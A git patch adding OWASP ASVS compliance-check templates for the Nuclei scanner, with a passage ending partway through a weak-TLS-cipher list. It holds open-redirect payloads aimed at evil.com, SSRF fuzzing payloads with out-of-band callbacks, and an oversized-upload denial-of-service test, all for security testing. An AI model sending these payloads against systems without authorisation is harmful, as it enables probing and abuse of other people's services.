From e683faafb424710972ba92efebf762241436247d Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 11 Sep 2024 16:16:29 +0330 Subject: [PATCH] Implement 9 new Nuclei Templates for ASVS 4.0.3 Compliance Checks (#4) * Update info.md update small details in side bar * Update index.md add Licensing section * Update index.md * Update index.md * Update info.md add link to the github repo * Create README.md * Create MIT LICENSE * Update index.md Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> * Update index.md add project desc Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> * Create CONTRIBUTING.md add 'how to contribute' file Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> * Update and rename tab_example.md to tab_contributing.md add contribution guideline on main owasp website of project Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> * Update README.md add readme file content Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> * Update info.md edit sidebar add icons Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> * Update README.md Signed-off-by: Hamed Salimian * Update README.md Signed-off-by: Hamed Salimian * Create syntax-checking.yml Signed-off-by: Hamed Salimian * Create template-validate.yml Signed-off-by: Hamed Salimian * Create templates folder Signed-off-by: Hamed Salimian * Added static vulnerable project as submodule on dev * Create 13.2.1.yaml Signed-off-by: Hamed Salimian * Update syntax-checking.yml Add PUSH event to workflow Signed-off-by: Hamed Salimian * Update 13.2.1.yaml Signed-off-by: Hamed Salimian * Create .yamllint Signed-off-by: Hamed Salimian * Update template-validate.yml add PUSH event to workflow Signed-off-by: Hamed Salimian * Update 13.2.1.yaml Fix lint issues. Signed-off-by: Hamed Salimian * Create 9-1-3.yaml Signed-off-by: Reza Saeedi * Update 13.2.1.yaml Fix lint issue. Signed-off-by: Hamed Salimian * Update 9-3-1.yaml Signed-off-by: Reza Saeedi * Rename 9-3-1.yaml to 9.1.3.yaml Signed-off-by: Reza Saeedi * Update 13.2.1.yaml Edit `id` and `reference` Signed-off-by: Hamed Salimian * Create 14.4.1.yaml Create ASVS-4.0.3-V14.4.1 template. Signed-off-by: Hamed Salimian * Update template-validate.yml Signed-off-by: Hamed Salimian * Update template-validate.yml Signed-off-by: Hamed Salimian * Update template-validate.yml Signed-off-by: Hamed Salimian * Update 13.2.1.yaml Signed-off-by: Hamed Salimian * Update 14.4.1.yaml Signed-off-by: Hamed Salimian * Update template-validate.yml Signed-off-by: Hamed Salimian * Update 14.4.1.yaml Signed-off-by: Hamed Salimian * Update 14.4.1.yaml Signed-off-by: Hamed Salimian * Update 14.4.1.yaml Signed-off-by: Hamed Salimian * Update tab_contributing.md Signed-off-by: Hamed Salimian * Create 14.4.2.yaml Signed-off-by: Hamed Salimian * Update 14.4.2.yaml Signed-off-by: Hamed Salimian * Update README.md Signed-off-by: Hamed Salimian * Update tab_contributing.md Signed-off-by: Hamed Salimian * Create 14.4.3.yaml Signed-off-by: Hamed Salimian * Update 14.4.3.yaml Signed-off-by: Hamed Salimian * Create 14.4.4.yaml Signed-off-by: Hamed Salimian * Create 14.4.5.yaml Signed-off-by: Hamed Salimian * Update 14.4.5.yaml Signed-off-by: Hamed Salimian * Create 14.4.6.yaml Signed-off-by: Hamed Salimian * Create 14.4.7.yaml Signed-off-by: Hamed Salimian * Update 13.2.1.yaml Signed-off-by: Hamed Salimian * Update Submodule * Create 14.5.2.yaml Signed-off-by: Hamed Salimian * Create 14.5.3.yaml Signed-off-by: Hamed Salimian * Update tab_contributing.md Signed-off-by: Hamed Salimian * Update README.md Signed-off-by: Hamed Salimian * Update 13.2.1.yaml Signed-off-by: Hamed Salimian * Create 14.5.1.yaml Signed-off-by: Hamed Salimian * Update 14.5.1.yaml Signed-off-by: Hamed Salimian * Update 13.2.1 14.5.1 * Add 14.3.2 workflow * Create 14.2.3.yaml * Update Submodule * Update 14.2.3.yaml Signed-off-by: Hamed Salimian * Create 13.3.1.yaml Signed-off-by: Hamed Salimian * Update 13.3.1.yaml Signed-off-by: Hamed Salimian * Update template-validate.yml Signed-off-by: Hamed Salimian * Update template-validate.yml Signed-off-by: Hamed Salimian * Update template-validate.yml Signed-off-by: Hamed Salimian * Create 13.2.2.yaml Signed-off-by: Hamed Salimian * Update template-validate.yml Signed-off-by: Hamed Salimian * Update submodule * Fix reference of 9.1.3.yaml Signed-off-by: Hamed Salimian * Update template-validate.yml Signed-off-by: Hamed Salimian * Update template-validate.yml Signed-off-by: Hamed Salimian * Update tab_contributing.md Signed-off-by: Hamed Salimian * Update tab_contributing.md Signed-off-by: Hamed Salimian * Update README.md Signed-off-by: Hamed Salimian * Create 12.1.1.(2).yaml * Create 12.1.1.(2).yaml * Update template-validate.yml Signed-off-by: Hamed Salimian * fix template validation action * Add workflow templates * Fix workflows * Add status badges Signed-off-by: Hamed Salimian * Add status badges. Signed-off-by: Hamed Salimian * Create 12.6.1.yaml * fix template validation action * Vulnerable Page Updated. * Fix status badge * Update Submodule * Create 5.1.5.yaml * fix 5.1.5.yaml * fix template validation action * Create 8.2.1.yaml * Update 8.2.1.yaml * Update 8.2.1.yaml * Add logo README.md Signed-off-by: Hamed Salimian * Update Submodule * Create 12.3.3.yaml * Add LOGO README.md Signed-off-by: Hamed Salimian * Fix logo alignment Signed-off-by: Hamed Salimian * Create 9.1.2.yaml * Create 5.5.2.yaml * Add 5.3.3.1.yaml * Create 5.3.3.2.yaml * Update 5.3.3.1.yaml * Create 5.2.6.yaml & Update 5.5.2.yaml * Fix 5.2.6.yaml * Fix 12.6.1.yaml * Update 12.6.1.yaml * Update 5.1.5.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> * Update 5.2.6.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> * Update 5.2.6.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> * Update 5.3.3.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> * Update 5.3.3.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> * Update 5.5.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> * Add 12.1.1, 12,3,3, 12,6,1, 5.1.5, 5.3.3 Vulnerable pages * Update 8.2.1.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> * Update 9.1.2.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> * Update 12.3.3.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> * Update 12.6.1.yaml Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> * Ajibe * Ajibe * Fixed * Fixed * Chore: Fix Late night --------- Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Signed-off-by: Hamed Salimian Signed-off-by: Reza Saeedi Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Co-authored-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Co-authored-by: Reza Saeedi Co-authored-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> --- .gitmodules | 2 +- README.md | 9 +- Vulnerable-Pages | 2 +- templates/12.1.1.yaml | 64 ++ templates/12.6.1.yaml | 58 ++ templates/5.1.5.yaml | 141 ++++ templates/8.2.1.yaml | 28 + templates/9.1.2.yaml | 425 ++++++++++ templates/9.1.3.yaml | 2 +- templates/code/12.1.1.2.yaml | 59 ++ templates/code/source/zipbomb.py | 768 ++++++++++++++++++ templates/dast/12.3.3.yaml | 47 ++ templates/dast/5.2.6.yaml | 106 +++ templates/dast/5.3.3.2.yaml | 56 ++ templates/dast/5.5.2.yaml | 62 ++ templates/headless/5.3.3.1.yaml | 54 ++ templates/workflows/14.3.2.yaml | 50 +- .../exposures/logs/django-debug-exposure.yaml | 33 + .../exposures/logs/jboss-seam-debug-page.yaml | 30 + .../exposures/logs/pyramid-debug-toolbar.yaml | 31 + .../exposures/logs/rails-debug-mode.yaml | 24 + .../exposures/logs/struts-debug-mode.yaml | 23 + .../exposures/logs/struts-problem-report.yaml | 29 + .../airflow/airflow-debug.yaml | 31 + .../misconfiguration/aspx-debug-mode.yaml | 38 + .../browserless-debugger.yaml | 33 + .../misconfiguration/debug/ampache-debug.yaml | 34 + .../misconfiguration/debug/bottle-debug.yaml | 36 + .../misconfiguration/django-debug-detect.yaml | 29 + .../laravel-debug-enabled.yaml | 31 + .../misconfiguration/laravel-debug-error.yaml | 26 + .../laravel-debug-infoleak.yaml | 53 ++ .../php-debugbar-exposure.yaml | 34 + .../misconfiguration/php-errors.yaml | 47 ++ .../rekognition-image-validation.yaml | 35 + .../misconfiguration/sitecore-debug-page.yaml | 27 + .../misconfiguration/struts-ognl-console.yaml | 34 + .../misconfiguration/symfony-debug.yaml | 41 + .../misconfiguration/typo3-debug-mode.yaml | 31 + .../misconfiguration/wamp-xdebug-detect.yaml | 29 + .../werkzeug-debugger-detect.yaml | 22 + .../jenkins/jenkins-stack-trace.yaml | 32 + 42 files changed, 2717 insertions(+), 29 deletions(-) create mode 100644 templates/12.1.1.yaml create mode 100644 templates/12.6.1.yaml create mode 100644 templates/5.1.5.yaml create mode 100644 templates/8.2.1.yaml create mode 100644 templates/9.1.2.yaml create mode 100644 templates/code/12.1.1.2.yaml create mode 100644 templates/code/source/zipbomb.py create mode 100644 templates/dast/12.3.3.yaml create mode 100644 templates/dast/5.2.6.yaml create mode 100644 templates/dast/5.3.3.2.yaml create mode 100644 templates/dast/5.5.2.yaml create mode 100644 templates/headless/5.3.3.1.yaml create mode 100644 templates/workflows/exposures/logs/django-debug-exposure.yaml create mode 100644 templates/workflows/exposures/logs/jboss-seam-debug-page.yaml create mode 100644 templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml create mode 100644 templates/workflows/exposures/logs/rails-debug-mode.yaml create mode 100644 templates/workflows/exposures/logs/struts-debug-mode.yaml create mode 100644 templates/workflows/exposures/logs/struts-problem-report.yaml create mode 100644 templates/workflows/misconfiguration/airflow/airflow-debug.yaml create mode 100644 templates/workflows/misconfiguration/aspx-debug-mode.yaml create mode 100644 templates/workflows/misconfiguration/browserless-debugger.yaml create mode 100644 templates/workflows/misconfiguration/debug/ampache-debug.yaml create mode 100644 templates/workflows/misconfiguration/debug/bottle-debug.yaml create mode 100644 templates/workflows/misconfiguration/django-debug-detect.yaml create mode 100644 templates/workflows/misconfiguration/laravel-debug-enabled.yaml create mode 100644 templates/workflows/misconfiguration/laravel-debug-error.yaml create mode 100644 templates/workflows/misconfiguration/laravel-debug-infoleak.yaml create mode 100644 templates/workflows/misconfiguration/php-debugbar-exposure.yaml create mode 100644 templates/workflows/misconfiguration/php-errors.yaml create mode 100644 templates/workflows/misconfiguration/rekognition-image-validation.yaml create mode 100644 templates/workflows/misconfiguration/sitecore-debug-page.yaml create mode 100644 templates/workflows/misconfiguration/struts-ognl-console.yaml create mode 100644 templates/workflows/misconfiguration/symfony-debug.yaml create mode 100644 templates/workflows/misconfiguration/typo3-debug-mode.yaml create mode 100644 templates/workflows/misconfiguration/wamp-xdebug-detect.yaml create mode 100644 templates/workflows/technologies/werkzeug-debugger-detect.yaml create mode 100644 templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml diff --git a/.gitmodules b/.gitmodules index 18feab8..62cddbf 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,4 +1,4 @@ [submodule "Vulnerable-Pages"] path = Vulnerable-Pages url = https://github.com/Snbig/Vulnerable-Pages - branch = dev + branch = main diff --git a/README.md b/README.md index 3654252..a51d7a9 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,11 @@ +[![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) +[![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) + +

+ +

+ # OWASP ASVS Security Evaluation Templates with Nuclei @@ -23,4 +31,3 @@ For detailed information and guidelines about contributing in developing templat #### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) - diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 266f974..9f6162f 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 266f9741658e1da4ac76d42e5121f0721063070c +Subproject commit 9f6162ffc8b63d2a3eee3c8c68612e92ebc6283d diff --git a/templates/12.1.1.yaml b/templates/12.1.1.yaml new file mode 100644 index 0000000..60d8604 --- /dev/null +++ b/templates/12.1.1.yaml @@ -0,0 +1,64 @@ +id: ASVS-4-0-3-V12-1-1 + +info: + name: ASVS 12.1.1 Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-400 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html + tags: asvs,12.1.1 + description: | + Verify that the application will not accept large files that could fill up storage or cause a denial of service. + + +variables: + large_file_size: 10000000 + small_file_size: 100 + file_type: "text/plain" + file_ext: "txt" + +http: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}" + Content-Type: {{file_type}} + + {{rand_text_alpha({{small_file_size}})}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}" + Content-Type: {{file_type}} + + {{rand_text_alpha({{large_file_size}})}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + extractors: + - type: dsl + name: status code of large file upload. + dsl: + - status_code_2 + + matchers: + - type: dsl + name: status_code + condition: and + dsl: + - status_code_2 < 210 && status_code_2 >= 200 + - status_code_2 == status_code \ No newline at end of file diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml new file mode 100644 index 0000000..df170e0 --- /dev/null +++ b/templates/12.6.1.yaml @@ -0,0 +1,58 @@ +id: ASVS-4-0-3-V12-6-1 + +info: + name: ASVS 12.6.1 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/blind-ssrf.yaml + - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ + tags: asvs,12.6.1 + description: | + Verify that the web or application server is configured with an allow list of resources or systems to which the server can send requests or load data/files from. + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + ssrf: + - "{{interactsh-url}}" + - "{{FQDN}}.{{interactsh-url}}" + - "{{RDN}}.{{interactsh-url}}" + - "{{FQDN}}@{{interactsh-url}}" + - "{{RDN}}@{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" + + - part: body + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" + + - part: header + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + - "dns" diff --git a/templates/5.1.5.yaml b/templates/5.1.5.yaml new file mode 100644 index 0000000..6c073bd --- /dev/null +++ b/templates/5.1.5.yaml @@ -0,0 +1,141 @@ +id: ASVS-4-0-3-V5-1-5 + +info: + name: ASVS 5.1.5 Check + author: AmirHossein Raeisi + severity: low + classification: + cwe-id: CWE-601 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html + - https://cwe.mitre.org/data/definitions/601.html + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect + - https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/generic/open-redirect-generic.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5/ + tags: asvs,5.1.5 + description: | + Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. + +variables: + vulnerable_parameter: "url" + +http: + - method: GET + path: + - "{{BaseURL}}/{{payload}}" + - "{{BaseURL}}//{{payload}}" + - "{{BaseURL}}/?{{vulnerable_parameter}}={{payload}}" + - "{{BaseURL}}?{{vulnerable_parameter}}={{payload}}" + + payloads: + payload: + - '%0a/evil.com/' + - '%0d/evil.com/' + - '%00/evil.com/' + - '%09/evil.com/' + - '%5C%5Cevil.com/%252e%252e%252f' + - '%5Cevil.com' + - '%5cevil.com/%2f%2e%2e' + - '%5c{{RootURL}}evil.com/%2f%2e%2e' + - '../evil.com' + - '.evil.com' + - '/%5cevil.com' + - '////\;@evil.com' + - '////evil.com' + - '///evil.com' + - '///evil.com/%2f%2e%2e' + - '///evil.com@//' + - '///{{RootURL}}evil.com/%2f%2e%2e' + - '//;@evil.com' + - '//\/evil.com/' + - '//\@evil.com' + - '//\evil.com' + - '//\tevil.com/' + - '//evil.com/%2F..' + - '//evil.com//' + - '//%69%6e%74%65%72%61%63%74%2e%73%68' + - '//evil.com@//' + - '//evil.com\tevil.com/' + - '//https://evil.com@//' + - '/<>//evil.com' + - '/\/\/evil.com/' + - '/\/evil.com' + - '/\evil.com' + - '/evil.com' + - '/evil.com/%2F..' + - '/evil.com/' + - '/evil.com/..;/css' + - '/https:evil.com' + - '/{{RootURL}}evil.com/' + - '/〱evil.com' + - '/〵evil.com' + - '/ゝevil.com' + - '/ーevil.com' + - '/ーevil.com' + - '<>//evil.com' + - '@evil.com' + - '@https://evil.com' + - '\/\/evil.com/' + - 'evil%E3%80%82com' + - 'evil.com' + - 'evil.com/' + - 'evil.com//' + - 'evil.com;@' + - 'https%3a%2f%2fevil.com%2f' + - 'https:%0a%0devil.com' + - 'https://%0a%0devil.com' + - 'https://%09/evil.com' + - 'https://%2f%2f.evil.com/' + - 'https://%3F.evil.com/' + - 'https://%5c%5c.evil.com/' + - 'https://%5cevil.com@' + - 'https://%23.evil.com/' + - 'https://.evil.com' + - 'https://////evil.com' + - 'https:///evil.com' + - 'https:///evil.com/%2e%2e' + - 'https:///evil.com/%2f%2e%2e' + - 'https:///evil.com@evil.com/%2e%2e' + - 'https:///evil.com@evil.com/%2f%2e%2e' + - 'https://:80#@evil.com/' + - 'https://:80?@evil.com/' + - 'https://:@\@evil.com' + - 'https://:@evil.com\@evil.com' + - 'https://;@evil.com' + - 'https://\tevil.com/' + - 'https://evil.com/evil.com' + - 'https://evil.com/https://evil.com/' + - 'https://www.\.evil.com' + - 'https:/\/\evil.com' + - 'https:/\evil.com' + - 'https:/evil.com' + - 'https:evil.com' + - '{{RootURL}}evil.com' + - '〱evil.com' + - '〵evil.com' + - 'ゝevil.com' + - 'ーevil.com' + - 'ーevil.com' + - 'redirect/evil.com' + - 'cgi-bin/redirect.cgi?evil.com' + - 'out?evil.com' + - 'login?to=http://evil.com' + - '1/_https@evil.com' + - 'redirect?targeturl=https://evil.com' + + redirects: false + matchers-condition: and + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 + - type: status + status: + - 301 + - 302 + - 303 + - 304 + - 307 + - 308 diff --git a/templates/8.2.1.yaml b/templates/8.2.1.yaml new file mode 100644 index 0000000..83002bb --- /dev/null +++ b/templates/8.2.1.yaml @@ -0,0 +1,28 @@ +id: ASVS-4-0-3-V8-2-1 + +info: + name: ASVS 8.2.1 Check + author: AmirHossein Raeisi + severity: info + classification: + cwe-id: CWE-525 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses + - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control + tags: asvs,8.2.1 + description: | + Verify the application sets sufficient anti-caching headers so that sensitive data is not cached in modern browsers. + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?i)cache-control:.*no-store' + negative: true diff --git a/templates/9.1.2.yaml b/templates/9.1.2.yaml new file mode 100644 index 0000000..5170641 --- /dev/null +++ b/templates/9.1.2.yaml @@ -0,0 +1,425 @@ +id: ASVS-4-0-3-V9-1-2 + +info: + name: ASVS 9.1.2 Check + author: AmirHossein Raeisi + severity: Low + classification: + cwe-id: CWE-918 + reference: + - https://www.acunetix.com/vulnerabilities/web/tls-ssl-weak-cipher-suites/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/ssl/insecure-cipher-suite-detect.yaml + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Security_Cheat_Sheet.html + tags: asvs,9.1.2 + description: | + Verify using up to date TLS testing tools that only strong cipher suites are enabled, with the strongest cipher suites set as preferred. + +ssl: + - address: "{{Host}}:{{Port}}" + min_version: tls10 + max_version: tls10 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls11 + max_version: tls11 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - 